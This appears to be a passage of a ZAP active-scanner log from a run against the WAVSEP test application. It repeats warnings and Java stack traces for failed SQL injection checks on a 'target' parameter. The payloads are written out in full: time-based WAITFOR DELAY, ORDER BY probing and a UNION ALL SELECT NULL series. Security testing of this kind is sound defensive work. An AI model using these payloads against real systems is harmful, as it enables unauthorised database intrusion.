[http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND (2021=2021] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND (2021=2021 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681341 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681341 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) ORDER BY 2707-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://) ORDER BY 2707-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681342 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND ('IOcf'='IOcf] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND ('IOcf'='IOcf at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681351 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://) UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681352 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://) UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681353 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://) UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681354 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://) UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681355 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681355 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681356 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681358 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681358 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND 'WPZs'='WPZs] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND 'WPZs'='WPZs at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at 